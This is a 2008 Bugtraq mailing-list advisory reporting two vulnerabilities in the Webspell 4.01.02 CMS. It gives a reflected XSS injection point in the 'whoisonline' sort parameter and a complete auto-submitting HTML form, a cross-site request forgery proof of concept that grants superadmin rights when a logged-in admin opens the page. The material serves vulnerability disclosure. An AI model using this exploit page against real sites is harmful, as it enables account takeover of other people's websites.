[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Webspell 4.01.02   2 Vulnerabilites
From:       nbbn () gmx ! net
Date:       2008-01-30 13:12:58
Message-ID: 200801301412.58326.nbbn () gmx ! net
[Download RAW message or body]

########################################################################################
Webspell 4.01.02         2 Vulnerabilites     Founded by NBBN      Vendor: 
http://cms.webspell.org
########################################################################################

1) Cross-Site Scripting Vulnerability
2) Change User Permission XSRF Vulnerability




1)

http://site.tld/path/index.php?site=whoisonline&sort=">[xss code]










2)

This creates a superadmin account, when an admin click a link, to a site with 
the following code:

<html>
<head>
<title>Superadmin Creator</title>
</head>
<body onLoad=javascript:document.formular.submit()>

<form name="formular" 
action="http://site.tld/webspell/admin/admincenter.php?site=members" 
method="POST">
<input type="hidden" name="superadmin" value="1">
<input type="hidden" name="id" value="3"> <!-- userid -->
<input type="hidden" name="saveedit" value="update+member">
</form>

</body>
</html>


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic